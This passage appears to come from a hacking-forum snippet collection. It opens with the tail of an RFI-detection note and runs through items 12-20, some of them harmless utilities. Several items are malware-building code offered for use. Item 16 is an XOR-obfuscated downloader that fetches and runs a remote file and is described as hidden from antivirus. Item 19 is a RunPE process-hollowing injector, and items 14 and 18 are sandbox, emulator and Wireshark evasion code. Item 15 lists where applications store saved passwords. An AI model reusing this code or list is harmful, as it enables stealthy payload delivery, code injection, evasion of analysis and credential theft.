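        print(f"{ip:15} {tag:40} {evidence}")
```

Generic parameter names from the table such as url, file and IP are deliberately left out of RFI_PARAMS, because legitimate applications use them and the remote-URL test alone would produce false positives; add them only behind an allowlist of hosts. The sweep threshold is a starting point, not a tuned value: a real site with many missing component paths from ordinary crawlers needs a higher one or a time window. The requests the sweep and RFI checks catch succeed only where a listed component is installed and reads its include path from the request, so the durable fix is removing or updating those components and keeping register_globals off; the detection is there to tell you who is looking.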
12.
#!/usr/bin/python
import httplib, socket, time, re, os, sys, datetime

# Hello world!
os.system('clear')
print "==================================================="
print "== Webserverwatcher.py | www.ethicalhack3r.co.uk =="
print "==================================================="
print

url = raw_input("Enter the URL you want to keep an eye on: ")

# Check URL
http = "http://"
if http in url:
    print
    print "ERROR! Remove http:// from the URL."
    url = raw_input("Enter the URL you want to keep an eye on: ")

count = 0

while 1:
    # Count how many times the script has run
    count = count + 1

    # Get today's date/time
    getdate = datetime.datetime.today()
    today = getdate.strftime("%d/%m/%Y %H:%M:%S")

    # Get webserver IP
    socket.setdefaulttimeout(15)
    try:
        socket.gethostbyname(url)
    except socket.error:
        os.system('clear')
        print "==================================================="
        print "== Webserverwatcher.py | www.ethicalhack3r.co.uk =="
        print "==================================================="
        print
        print "SOCKET ERROR! 1)Check the URL 2)Check your internet connection 3)Try again."
        print
        sys.exit()

    # HTTP HEAD request
    conn = httplib.HTTPConnection(url, 80)
    try:
        conn.request("HEAD", "/")
    except socket.timeout:
        print "Webserver has timed out. Check URL and internet connection."

    # Read HTTP response
    res = conn.getresponse()

    # Close HTTP connection
    conn.close()

    # Turn headers into variables
    ip = socket.gethostbyname(url)
    server = res.getheader('Server')
    xpoweredby = res.getheader('x-powered-by')
    date = res.getheader('date')

    # Print some output
    os.system('clear')
    print "==================================================="
    print "== Webserverwatcher.py | www.ethicalhack3r.co.uk =="
    print "==================================================="
    print
    print res.status, res.reason
    print
    if xpoweredby == None:
        print ip + " " + server + " " + date
    else:
        print ip + " " + server + " " + xpoweredby + " " + date
    print
    print "The script has run", count, "time/s."

    if (count < 2):
        # Save header data to log file
        outfile = file('log.txt', 'w')
        outfile.write("Started on " + today + "\n")
        outfile.write(ip + " ")
        outfile.write(server + " ")
        # Check if xpoweredby header exists, if it does save to log
        if xpoweredby != None:
            outfile.write(xpoweredby + " ")
            outfile.write(date + "\n")
            outfile.close()
        else:
            outfile.write(date + "\n")
            outfile.close()
        # Print some output
        print
        print "Logged!"
        print
    else:
        # Read file to compare old/new headers
        readfile = open('log.txt', "r")
        text = readfile.read()
        # Check if log file IP is same as new IP
        if ip not in text:
            outfile = file('log.txt', 'a')
            outfile.write('IP address has been changed! New IP is ' + ip + ' ' + date + '\n')
            outfile.close()
        # Check if log file server is same as new server
        if server not in text:
            outfile = file('log.txt', 'a')
            outfile.write('Web Server software has been changed! New server is ' + server + ' ' + date + '\n')
            outfile.close()
        # Check if log file x-powered-by header is same as new one
        if xpoweredby != None and xpoweredby not in text:
            outfile = file('log.txt', 'a')
            outfile.write('X-powered-by header has been changed! New header is ' + xpoweredby + ' ' + date + '\n')
            outfile.close()

    # Time to wait between HTTP requests (3600 seconds = 1hr)
    try:
        time.sleep(3600)
    except KeyboardInterrupt:
        outfile = file('log.txt', 'a')
        outfile.write("Finished on " + today)
        outfile.close()
        print
        print "Check log.txt."
        print
        sys.exit()
13.
#!/usr/bin/python
#
# linux ONLY
#
# ProxyHarvest.py v1.1
#
# REQUIREMENTS:
# - GeoIP Database + GeoIP Python API
# - sudo apt-get install libgeoip1 && sudo apt-get install python-geoip (ubuntu/debian)
#
# Extract IP:Port from a proxylist site code from low1z lurking at darkc0de.com
# this code is protected under the gpl get your copy at <http://www.gnu.org/licenses/>
#
# update from 0.9 - 1.1 notes
# - fetch planetlab(codeen) proxylist & clean our list with it
# - validate external ip with whatsmyip.com
# - GeoIP
#
# - !! due to urllib1/2 limitations there is no way yet to accept username/passwd input !!

import sys, os, urllib, urllib2, re, httplib, sets, socket
from time import time, localtime, strftime
from socket import gethostbyaddr

nogeoip = 0
try:
    import GeoIP
except:
    nogeoip = 1
    print "\nGeoIP Module/Database NOT found, try:"
    print "sudo apt-get install libgeoip1 && sudo apt-get install python-geoip"
    print "or visit www[.]maxmind[.]com for download"
    print "GeoIP is not required but highly recommended!\n"

output = 'proxylist.txt'
sleeptimer = 3
socket.setdefaulttimeout(2)
alivelist = []
myipadress = urllib.urlopen('http://www.whatismyip.com/automation/n09230945.asp').read()
anon_list = []
trans_list = []
planetlab = []

sites = ['http://www.darkc0de.com/cgi-bin/proxies.py',
         'http://www.1proxyfree.com/',
         'http://www.atomintersoft.com/products/alive-proxy/socks5-list/',
         'http://www.proxylist.net/',
         'http://www.proxylists.net/http_highanon.txt']

def StripTags(text):
    return re.sub(r'<[^>]*?>','', text)

def timer():
    now = strftime('%H:%M:%S-%d/%b/%Y', localtime())
    return now

def ipcheck(proxy):
    # fetch our external address through the proxy; if it still shows our own
    # address the proxy is transparent, otherwise it is treated as anonymous
    try:
        pxhandle = urllib2.ProxyHandler({"http": proxy})
        opener = urllib2.build_opener(pxhandle)
        urllib2.install_opener(opener)
        myip = urllib2.urlopen('http://www.whatismyip.com/automation/n09230945.asp').read()
        xs = re.findall(('\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}'), StripTags(myip))
        if xs[0] == myipadress or myipadress == myip:
            trans_list.append(proxy)
            print proxy[:-1],"\t- ALIVE -", timer(), "- TRANSPARENT"
        elif xs == None:
            pass
        else:
            anon_list.append(proxy)
            print proxy[:-1],"\t- ALIVE -", timer(), "- EXT-iP :",xs[0]
    except KeyboardInterrupt:
        print "\n\nCTRL+C - check temporary proxylist file\n\n"
        sys.exit(0)
    except:
        pass

def proxyvalidator(proxylist):
    finalcount = 0
    for proxy in proxylist:
        proxy.replace('\n', '')
        try:
            proxies = {'http': "http://"+proxy[:-1]}
            opener = urllib.FancyURLopener(proxies)
            try:
                loopchk = opener.open("http://www.google.com").read()
            except:
                pass
        except(IOError,socket.timeout), detail:
            pass
        ipcheck(proxy)
        alivelist.append(proxy)
        finalcount += 1
    return alivelist

def getsamairdotru():
    counter = 1
    pxycnt = 0
    maxpages = 10
    urls = []
    pfile = file(output, 'a')
    while counter <= maxpages:
        if counter < 10: # workaround for page-01 to page-09
            opener = urllib2.build_opener()
            opener.addheaders = [('User-agent', 'Mozilla/5.0')]
            url = opener.open('http://www.samair.ru/proxy/proxy-0'+repr(counter)+'.htm').read()
        else:
            opener = urllib2.build_opener()
            opener.addheaders = [('User-agent', 'Mozilla/5.0')]
            url = opener.open('http://www.samair.ru/proxy/proxy-'+repr(counter)+'.htm').read()
        strings = re.findall(('\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}:\d{1,5}'), StripTags(url))
        for string in strings:
            pfile.write(string+"\n")
            pxycnt = pxycnt+1
        counter = counter+1
        opener.close()
    print pxycnt, "\t: Proxies received from : http://www.samair.ru/proxy/"
    pfile.close()

def getsinglesitelist(site):
    pxycnt = 0
    urls = []
    pfile = file(output, 'a')
    opener = urllib2.build_opener()
    opener.addheaders = [('User-agent', 'Mozilla/5.0')]
    url = opener.open(site).read()
    strings = re.findall(('\d{1,3}[.]\d{1,3}[.]\d{1,3}[.]\d{1,3}[:]\d{1,5}'), StripTags(url))
    for string in strings:
        pfile.write(string+"\n")
        pxycnt = pxycnt+1
    print pxycnt, "\t: Proxies received from :", site.split("//",3)[1]
    opener.close()
    pfile.close()

def getplanetlabs():
    opener = urllib2.build_opener()
    url = opener.open('http://fall.cs.princeton.edu/codeen/tabulator.cgi?table=table_all').read()
    strings = re.findall(('\d{1,3}[.]\d{1,3}[.]\d{1,3}[.]\d{1,3}'), StripTags(url))
    for string in strings:
        planetlab.append(string)
    print len(planetlab), "\t: PlanetLab Proxylist Loaded", "\n"

def cleanup():
    # drop duplicates and anything whose address is a PlanetLab (CoDeeN) node
    pfile = open(output, 'r').readlines()
    outfile = file(output, 'w')
    sorted = []
    finalcount = 0
    psremove = 0
    for proxy in pfile:
        if proxy.split(':',1)[0] not in planetlab:
            if proxy not in sorted:
                sorted.append(proxy)
                outfile.write(proxy)
                finalcount += 1
        if proxy.split(':',1)[0] in planetlab:
            psremove += 1
    print "\n", psremove, "\t: PlanetLab (CoDeen) Proxies removed!"
    print finalcount,"\t: unique Proxies found\n"
    print "+-[Starting Validation]-----------------------------------------------------+"
    outfile.close()

def fileConst():
    fileC = open(output, 'w')
    falive = []
    fileC.write('+ This List has been generated with proxyharvest_1.1.py // www.darkc0de.com\n')
    fileC.write('+ ANONYMOUS PROXIES\n\n')
    for anon in anon_list:
        fileC.write(anon)
        if anon in alivelist:
            alivelist.remove(anon)
    fileC.write('\n\n+ TRANSPARENT PROXIES\n\n')
    for trans in trans_list:
        fileC.write(trans)
        if trans in alivelist:
            alivelist.remove(trans)
    fileC.write('\n\n+ WORKING BUT UNCLEAR PROXIES\n\n')
    alivelist.sort()
    for alive in alivelist:
        fileC.write(alive)
    fileC.close()

def helpme():
    print "| -s / -sitecollect :: gathers proxylists |"
    print "| -m / -multipage :: get incremental pages |"
    print "| -a / -all :: do ALL!!! |"
    print "| -vl / - validatelist :: check a file |"
    print "+-----------------------------------------------+"

try:
    os.remove(output)
except:
    pass

print "+-----------------------------------------------+"
print "| ProxyHarvest.py 1.1 |"
print "| low1z 2009 // darkc0de |"
print "+-----------------------------------------------+"
print "IP:", myipadress, "//", timer(), "\n"
getplanetlabs()

if len(sys.argv) <= 1:
    print "\n\t < use -help to get options >\n"
    sys.exit(1)

for arg in sys.argv[1:]:
    if arg.lower() == "-h" or arg.lower() == "-help":
        helpme()
    if arg.lower() == "-s" or arg.lower() == "-sitecollect":
        for site in sites:
            try:
                getsinglesitelist(site)
            except:
                print "Error :", site
        cleanup()
        proxylist = open(output, 'r').readlines()
        proxyvalidator(proxylist)
    if arg.lower() == "-m" or arg.lower() == "-multipage":
        getsamairdotru()
        cleanup()
        print "may take some time to print out good proxies, be patient"
        try:
            proxylist = open(output, 'r').readlines()
            proxyvalidator(proxylist)
        except:
            pass
    if arg.lower() == "-a" or arg.lower() == "-all":
        try:
            for site in sites:
                getsinglesitelist(site)
            getsamairdotru()
            cleanup()
            proxylist = open(output, 'r').readlines()
            proxyvalidator(proxylist)
        except:
            print "something went wrong... using -a seems a bit buggy"
    if arg.lower() == "-vl" or arg.lower() == "-validatelist":
        try:
            proxyfile = open(sys.argv[2], 'r').readlines()
            proxyvalidator(proxyfile)
        except(IndexError):
            print "Error: check your proxy file ...\n"
            sys.exit(0)

print "\n+-[ANON LIST]-------------------------------------------------------------+\n"
for anon_proxy in anon_list:
    try:
        haddr = gethostbyaddr(anon_proxy.split(':',1)[0])
    except:
        haddr = '-'
    if nogeoip == 1:
        print anon_proxy.replace('\n',''),"\t| HostAddress:", haddr[0]
        pass
    elif nogeoip == 0:
        gi = GeoIP.new(GeoIP.GEOIP_MEMORY_CACHE)
        gx = gi.country_code_by_addr(anon_proxy.split(':',1)[0])
        print anon_proxy.replace('\n',''), "\t| Country:", gx,"\t| HostAddress:", haddr[0]
print "\n\t", len(anon_list), ": Total tested AnonProxies\n"

print "+-[TRANS LIST]--------------------------------------------------------------+\n"
for trans_proxy in trans_list:
    if nogeoip == 1:
        print trans_proxy.replace('\n','')
        pass
    elif nogeoip == 0:
        gi = GeoIP.new(GeoIP.GEOIP_MEMORY_CACHE)
        gx = gi.country_code_by_addr(trans_proxy.split(':',1)[0])
        print trans_proxy.replace('\n',''), "\t| Country:", gx
print "\n\t", len(trans_list), ": Total tested Transparent Proxies\n"

print "+-[OTHER SERVERS]-----------------------------------------------------------+\n"
if len(alivelist) > 16:
    print len(alivelist), "Alive but unverified Servers, check", output
else:
    for alive in alivelist:
        if alive not in trans_list:
            if alive not in anon_list:
                print alive.replace('\n','')

fileConst()
  14. Anti-Sandboxie:

[DllImport("kernel32.dll")]
public static extern IntPtr GetModuleHandle(string lpModuleName);

private void DetectSandboxie()
{
    if (GetModuleHandle("SbieDll.dll").ToInt32() != 0)
    {
        // Sandboxie Detected
        // Code Here
    }
}

Anti-Emulation

private void DetectEmulation()
{
    long tickCount = Environment.TickCount;
    Thread.Sleep(500);
    long tickCount2 = Environment.TickCount;
    if (((tickCount2 - tickCount) < 500L))
    {
        // Emulation Detected
        // Code Here
    }
}

Anti-Wireshark

private void DetectWireshark()
{
    Process[] ProcessList = Process.GetProcesses();
    foreach (Process proc in ProcessList)
    {
        if (proc.MainWindowTitle.Equals("The Wireshark Network Analyzer"))
        {
            // Wireshark Detected
            // Code Here
        }
    }
}

Anti-WPE

private void DetectWPE()
{
    Process[] ProcessList = Process.GetProcesses();
    foreach (Process proc in ProcessList)
    {
        if (proc.MainWindowTitle.Equals("WPE PRO"))
        {
            // WPE Detected
            // Code Here
        }
    }
}
  15. Many people ask about the location in the Registry or file system where applications store their passwords. Here is a list of password storage locations for popular applications compiled by Nir Sofer. Be aware that even if you know the location of the saved password, it doesn't mean that you can move it from one computer to another. Many applications store the passwords in a way that prevents you from moving them to another computer or user profile.

* Internet Explorer 4.00 - 6.00: The passwords are stored in a secret location in the Registry known as the "Protected Storage". The base key of the Protected Storage is located under the following key: "HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider". You can browse the above key in the Registry Editor (RegEdit), but you won't be able to view the passwords, because they are encrypted. Also, this key cannot easily be moved from one computer to another, like you do with regular Registry keys.

* Internet Explorer 7.00 - 8.00: The new versions of Internet Explorer store the passwords in 2 different locations. AutoComplete passwords are stored in the Registry under HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2. HTTP Authentication passwords are stored in the Credentials file under Documents and Settings\Application Data\Microsoft\Credentials, together with login passwords of LAN computers and other passwords.

* Firefox: The passwords are stored in one of the following filenames: signons.txt, signons2.txt, and signons3.txt (depends on Firefox version). These password files are located inside the profile folder of Firefox, in [Windows Profile]\Application Data\Mozilla\Firefox\Profiles\[Profile Name]. Also, key3.db, located in the same folder, is used for encryption/decryption of the passwords.

* Google Chrome Web browser: The passwords are stored in [Windows Profile]\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data (this file is an SQLite database which contains encrypted passwords and other data).

* Opera: The passwords are stored in the wand.dat file, located under [Windows Profile]\Application Data\Opera\Opera\profile.

* Outlook Express (All Versions): The POP3/SMTP/IMAP passwords of Outlook Express are also stored in the Protected Storage, like the passwords of old versions of Internet Explorer.

* Outlook 98/2000: Old versions of Outlook stored the POP3/SMTP/IMAP passwords in the Protected Storage, like the passwords of old versions of Internet Explorer.

* Outlook 2002-2008: All new versions of Outlook store the passwords in the same Registry key as the account settings. The accounts are stored in the Registry under HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\[Profile Name]\9375CFF0413111d3B88A00104B2A6676\[Account Index]. If you use Outlook to connect to an account on an Exchange server, the password is stored in the Credentials file, together with login passwords of LAN computers.

* Windows Live Mail: All account settings, including the encrypted passwords, are stored in [Windows Profile]\Local Settings\Application Data\Microsoft\Windows Live Mail\[Account Name]. The account filename is an XML file with .oeaccount extension.

* ThunderBird: The password file is located under [Windows Profile]\Application Data\Thunderbird\Profiles\[Profile Name]. You should search for a filename with .s extension.

* Google Talk: All account settings, including the encrypted passwords, are stored in the Registry under HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts\[Account Name].

* Google Desktop: Email passwords are stored in the Registry under HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes\[Account Name].

* MSN/Windows Messenger version 6.x and below: The passwords are stored in one of the following locations:
  1. Registry Key: HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger
  2. Registry Key: HKEY_CURRENT_USER\Software\Microsoft\MessengerService
  3. In the Credentials file, with entry named as "Passport.Net\\*". (Only when the OS is XP or later)

* MSN Messenger version 7.x: The passwords are stored under HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Creds\[Account Name].

* Windows Live Messenger version 8.x/9.x: The passwords are stored in the Credentials file, with entry names beginning with "WindowsLive:name=".

* Yahoo Messenger 6.x: The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager ("EOptions string" value).

* Yahoo Messenger 7.5 or later: The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager ("ETS" value). The value stored in "ETS" cannot be recovered back to the original password.

* AIM Pro: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\AIM\AIMPRO\[Account Name].

* AIM 6.x: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords.

* ICQ Lite 4.x/5.x/2003: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\Mirabilis\ICQ\NewOwners\[ICQ Number] (MainLocation value).

* ICQ 6.x: The password hash is stored in [Windows Profile]\Application Data\ICQ\[User Name]\Owner.mdb (Access Database). (The password hash cannot be recovered back to the original password.)

* Digsby: The main password of Digsby is stored in [Windows Profile]\Application Data\Digsby\digsby.dat. All other passwords are stored on Digsby servers.

* PaltalkScene: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\Paltalk\[Account Name].
  16. That's a simple web downloader. At the beginning the file has no APIs except the kernel.dll, so the AVs can't find any dangerous code. It only works on XP SP3 because the kernel.dll addresses change with every SP.

.386
.model flat,stdcall
option casemap:none

.data
;Download strings
file db "download.jpg",0 ;will be saved as
url db "http://i33.tinypic.com/16ljles.jpg",0 ;url to file
open db "open",0
;crypted urlmon.dll and URLDownloadToFileA Api
dll db "pwihjk+aii",0
api db "PWIAjrkijdaQjCli`D",0
;crypted shell32.dll and ShellExecuteA Api
dll2 db "vm`ii67+aii",0
api2 db "Vm`ii@}`fpq`D",0

.code
start:
;Get size of the dll string
push offset dll
mov eax ,7C80BE46h
call eax
;decrypt dll string
mov ecx,eax
mov edi,offset dll
lp:
mov al, byte ptr [edi]
xor al,5
mov byte ptr [edi],al
inc edi
loop lp
;get size of the dll string
push offset api
mov eax ,7C80BE46h
call eax
;decrypt dll string
mov ecx,eax
mov edi,offset api
lp2:
mov al, byte ptr [edi]
xor al,5
mov byte ptr [edi],al
inc edi
loop lp2
;loadlibrary getprocaddress to load urlmon.dll and with getprocaddress find the address from the api
push offset dll
mov eax,7C801D7Bh
call eax
push offset api
push eax
mov ebx,7C80AE30h
call ebx
;execute urlmon
push 0
push 0
push offset file
push offset url
push 0
call eax
;get size
push offset dll2
mov eax ,7C80BE46h
call eax
;decrypt
mov ecx,eax
mov edi,offset dll2
lp3:
mov al, byte ptr [edi]
xor al,5
mov byte ptr [edi],al
inc edi
loop lp3
;get size
push offset api2
mov eax ,7C80BE46h
call eax
;decrypt
mov ecx,eax
mov edi,offset api2
lp4:
mov al, byte ptr [edi]
xor al,5
mov byte ptr [edi],al
inc edi
loop lp4
push offset dll2
mov eax,7C801D7Bh
call eax
push offset api2
push eax
mov ebx,7C80AE30h
call ebx
;execute shellexecute api
push 5
push 0
push 0
push offset file
push offset open
push 0
call eax
;exitprocess
push 0
mov eax,7C81CAFAh
call eax
end start
  17. [SECTION .text]
global _start
_start:
    jmp short ender
starter:
    xor eax, eax
    xor ebx, ebx
    xor edx, edx
    inc ebx
    mov al,4
    pop ecx ; eax = 4, ebx = 1, edx = len, ecx = pop
    mov dl, len
    int 0x80
    xor eax, eax
    inc eax ; Quit the shellcode.
    int 0x80
ender:
    call starter
    db "hello shellcoder =)",0x0a ; Call the message.
len equ $-ender

; Sh0ck - shock@k.st

[root@shock Desktop]# $ file=hello; od -An -j96 -N$(($(echo 0x$(readelf -t $file 2>&1 | awk '/.text/ {getline; print $4}')))) -w$(($(echo 0x$(readelf -t $file 2>&1 | awk '/.text/ {getline; print $4}')))) -tx1 $file | sed -e 's| |\\x|g'
\xeb\x13\x31\xc0\x31\xdb\x31\xd2\x43\xb0\x04\x59\xb2\x19\xcd\x80\x31\xc0\x40\xcd\x80\xe8\xe8\xff\xff\xff\x68\x65\x6c\x6c\x6f\x20\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x72\x20\x3d\x29\x0a

[root@shock Desktop]# $ file=hello; echo $(($(echo 0x$(readelf -t $file 2>&1 | awk '/.text/ {getline; print $4}'))))
46

46 Bytes. Enjoy =)
  18. ; ================================================================
; [ Anti-Wireshark ]
; Coded by Armaked0n of Macedonian Forces
; ----------------------------------------------------------------
; Greetz: Darkness.MKD, Darker, Bra1n1aC, KnOppIx, Outlaw, Vertigo
; ================================================================

.386
.model flat, stdcall
option casemap : none

include windows.inc
include kernel32.inc
include user32.inc
includelib kernel32.lib
includelib user32.lib

.data
szWiresharkWinText CHAR 'The Wireshark Network Analyzer', NULL
szWiresharkWinClass CHAR 'gdkWindowToplevel', NULL

.code
Start proc
    push TRUE
    call AntiWireshark
    push NULL
    call ExitProcess
Start endp

; ==================================================================================
; AntiWireshark -> anti Wireshark procedure
; ----------------------------------------------------------------------------------
; BOOL bKillWireshark
; Specifies whether the function should kill Wireshark if detected. TRUE specifies
; that this should be done, FALSE that the program should exit.
; ==================================================================================
AntiWireshark proc bKillWireshark : BOOL
    push offset szWiresharkWinText
    push offset szWiresharkWinClass
    call FindWindow
    cmp eax, NULL
    jne @wireshark_detected
    ret
@wireshark_detected:
    cmp dword ptr [bKillWireshark], FALSE
    jne @kill_wireshark
    push NULL
    call ExitProcess
@kill_wireshark:
    push NULL
    push NULL
    push WM_CLOSE
    push eax
    call SendMessage
    ret
AntiWireshark endp

end Start
  19. comment ^
WebEXE
originally by aphex
ported by shapeless
^
.386
.model flat, stdcall
option casemap: none

include c:\masm32\include\windows.inc
include c:\masm32\include\kernel32.inc
include c:\masm32\include\masm32.inc
includelib c:\masm32\lib\masm32.lib
includelib c:\masm32\lib\kernel32.lib

.data
szFile db "calc.exe",0

.data?
fHandle dword ?
dwSize dword ?
pBuff dword ?
BytesRead dword ?
ImageSize dword ?
InjectMem dword ?
pFileData dword ?
HeaderSize dword ?
szFileName byte 256 dup(?)
contxt CONTEXT <>
ProcInfo PROCESS_INFORMATION <>
StartInfo STARTUPINFO <>

.code
comment ^
inline DWORD GetAlignedSize(DWORD Size, DWORD Alignment)
{
    if( Size % Alignment == 0 ) return Size;
    return (((Size / Alignment) + 1) * Alignment);
}
^
GetAligned proc uses ecx edx dSize:dword,Aligned:dword
    xor edx,edx
    mov eax,dSize
    mov ecx,Aligned
    div ecx
    cmp edx,0
    jne @F
    mov eax,dSize
    ret
@@:
    inc eax
    xor edx,edx
    mov ecx,Aligned
    mul ecx
    ret
GetAligned endp

__ep:
    invoke CreateFile,addr szFile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0
    mov fHandle,eax
    invoke GetFileSize,eax,0
    mov dwSize,eax
    invoke VirtualAlloc,0,eax,MEM_COMMIT,PAGE_EXECUTE_READWRITE
    mov pBuff,eax
    invoke ReadFile,fHandle,eax,dwSize,addr BytesRead,0
    mov eax,pBuff
    xchg eax,edi
    assume edi:ptr IMAGE_DOS_HEADER
    add edi,[edi].e_lfanew
    assume edi:ptr IMAGE_NT_HEADERS
    xor esi,esi
    mov si,[edi].FileHeader.SizeOfOptionalHeader
    lea eax,[edi].OptionalHeader
    add esi,eax
    assume esi:ptr IMAGE_SECTION_HEADER
    push [edi].OptionalHeader.SizeOfHeaders
    pop HeaderSize
    invoke GetAligned,[edi].OptionalHeader.SizeOfHeaders,[edi].OptionalHeader.SectionAlignment
    mov ImageSize,eax
    ; save this value
    push eax
    ; save esi
    push esi
    mov dx,[edi].FileHeader.NumberOfSections
@@:
    cmp [esi].Misc.VirtualSize,0
    je lZero
    invoke GetAligned,[esi].Misc.VirtualSize,[edi].OptionalHeader.SectionAlignment
    add ImageSize,eax
lZero:
    mov eax,HeaderSize
    cmp eax,[esi].PointerToRawData
    jbe lNotSmaller
    push [esi].PointerToRawData
    pop HeaderSize
lNotSmaller:
    ; next item!
    add esi,SizeOf IMAGE_SECTION_HEADER
    dec dx
    jnz @B
    ; restore esi!
    pop esi
    invoke VirtualAlloc,0,ImageSize,MEM_COMMIT,PAGE_EXECUTE_READWRITE
    mov InjectMem,eax
    mov pFileData,eax
    invoke RtlMoveMemory,eax,pBuff,HeaderSize
    ; restore original headersize
    pop eax
    add pFileData,eax
    mov dx,[edi].FileHeader.NumberOfSections
@@:
    mov eax,[esi].SizeOfRawData
    cmp eax,0
    jbe lBelowOrZero
    cmp eax,[esi].Misc.VirtualSize
    jbe lBelowOrZero2
    mov eax,[esi].Misc.VirtualSize
lBelowOrZero2:
    mov ecx,pBuff
    add ecx,[esi].PointerToRawData
    ; save the counter value!
    push edx
    invoke RtlMoveMemory,pFileData,ecx,eax
    pop edx
    invoke GetAligned,[esi].Misc.VirtualSize,[edi].OptionalHeader.SectionAlignment
    add pFileData,eax
    jmp lContinue
lBelowOrZero:
    ; it wasnt above 0
    cmp [esi].Misc.VirtualSize,0
    je lContinue
    invoke GetAligned,[esi].Misc.VirtualSize,[edi].OptionalHeader.SectionAlignment
    add pFileData,eax
lContinue:
    ; next item!
    add esi,SizeOf IMAGE_SECTION_HEADER
    dec dx
    jnz @B
    invoke RtlZeroMemory,addr contxt,SizeOf CONTEXT
    invoke RtlZeroMemory,addr StartInfo,SizeOf STARTUPINFO
    invoke GetModuleFileName,0,addr szFileName,SizeOf szFileName
    invoke CreateProcess,0,addr szFileName,0,0,0,CREATE_SUSPENDED,0,0,addr StartInfo,addr ProcInfo
    mov contxt.ContextFlags,CONTEXT_FULL
    invoke GetThreadContext,ProcInfo.hThread,addr contxt
    invoke VirtualAllocEx,ProcInfo.hProcess,[edi].OptionalHeader.ImageBase,ImageSize,MEM_RESERVE or MEM_COMMIT,PAGE_EXECUTE_READWRITE
    invoke WriteProcessMemory,ProcInfo.hProcess,[edi].OptionalHeader.ImageBase,InjectMem,ImageSize,addr BytesRead
    mov eax,contxt.regEbx
    add eax,8
    lea ecx,[edi].OptionalHeader.ImageBase
    invoke WriteProcessMemory,ProcInfo.hProcess,eax,ecx,4,addr BytesRead
    push [edi].OptionalHeader.ImageBase
    pop eax
    add eax,[edi].OptionalHeader.AddressOfEntryPoint
    mov contxt.regEax,eax
    invoke SetThreadContext,ProcInfo.hThread,addr contxt
    invoke ResumeThread,ProcInfo.hThread
    invoke VirtualFree,InjectMem,0,MEM_RELEASE
    invoke VirtualFree,pBuff,0,MEM_RELEASE
    invoke CloseHandle,fHandle
    ret
end __ep
  20. faza posted this, it's basic but can come in handy if you need a quick hash or string encoding/decoding performed on IRC. (hex/base64/md5/sha/sha224/sha512/sha256/sha384/url) !comm for commands.

#!/usr/bin/python
#Hash Irc Bot
import socket, md5, base64, urllib, hashlib, sha

#Config################
ircserv = raw_input(u'server: ')
port = 6667
chan = raw_input(u'channel: ')
nick = raw_input(u'bot nick: ')
readbuffer = ""
#####################

irc = socket.socket (socket.AF_INET, socket.SOCK_STREAM )
try:
    irc.connect((ircserv, port))
except:
    print 'error!'
print irc.recv(4096)
irc.send('NICK '+nick+'\r\n')
irc.send('USER ' +(nick+' ')*3+' :Python IRC\r\n')
req=irc.recv(768)
#irc.send ('PONG :'+req.replace('PING :',''))
print 'PING? PONG!'
irc.send ('JOIN '+chan+'\r\n')

while 1:
    readbuffer=readbuffer+irc.recv(10240)
    temp=str.split(readbuffer, "\n")
    readbuffer=temp.pop( )
    for line1 in temp:
        line1=str.rstrip(line1)
        if line1.find("!quit ")>0:
            irc.send ('QUIT '+ line1.split('!quit ')[1]+'\r\n')
            print 'bot quit'
        if line1.find("!comm")>0:
            irc.send ('PRIVMSG '+ chan + ' :!hex, !unhex, !b64, !unb64, !md5, !sha, !sha224, !sha512, !sha256, !sha384, !url, !unurl, !hash\r\n')
            print 'function !comm'
        if line1.find("!md5 ")>0:
            irc.send ('PRIVMSG ' + chan + ' :md5: '+ md5.new(line1.split('!md5 ')[1]).hexdigest()+'\r\n')
            print 'function !md5'
        if line1.find("!hex ")>0:
            irc.send ('PRIVMSG ' + chan + ' :hex: 0x'+ base64.binascii.hexlify(line1.split('!hex ')[1]) + '\r\n')
            print 'function !hex'
        if line1.find("!b64 ")>0:
            irc.send ('PRIVMSG ' + chan + ' :base64: '+ base64.binascii.b2a_base64(line1.split('!b64 ')[1]) + '\r\n')
            print 'function !b64'
        if line1.find("!url ")>0:
            irc.send ('PRIVMSG ' + chan + ' :url: '+ urllib.quote(line1.split('!url ')[1]) + '\r\n')
            print 'function !url'
        if line1.find("!unurl ")>0:
            irc.send ('PRIVMSG ' + chan + ' :unurl: '+ urllib.unquote(line1.split('!unurl ')[1]) + '\r\n')
            print 'function !unurl'
        if line1.find("!unb64 ")>0:
            irc.send ('PRIVMSG ' + chan + ' :unbase64: '+ base64.binascii.a2b_base64(line1.split('!unb64 ')[1]) + '\r\n')
            print 'function !unb64'
        if line1.find("!unhex ")>0:
            irc.send ('PRIVMSG ' + chan + ' :unhex: '+ base64.binascii.unhexlify(line1.split('!unhex 0x')[1]) + '\r\n')
            print 'function !unhex'
        if line1.find("!sha ")>0:
            irc.send ('PRIVMSG ' + chan + ' :sha-1: '+ sha.new(line1.split('!sha ')[1]).hexdigest() + '\r\n')
            print 'function !sha'
        if line1.find("!sha224 ")>0:
            irc.send ('PRIVMSG ' + chan + ' :sha-224: '+ hashlib.sha224(line1.split('!sha224 ')[1]).hexdigest() + '\r\n')
            print 'function !sha224'
        if line1.find("!sha256 ")>0:
            irc.send ('PRIVMSG ' + chan + ' :sha-256: '+ hashlib.sha256(line1.split('!sha256 ')[1]).hexdigest() + '\r\n')
            print 'function !sha256'
        if line1.find("!sha384 ")>0:
            irc.send ('PRIVMSG ' + chan + ' :sha-384: '+ hashlib.sha384(line1.split('!sha384 ')[1]).hexdigest() + '\r\n')
            print 'function !sha384'
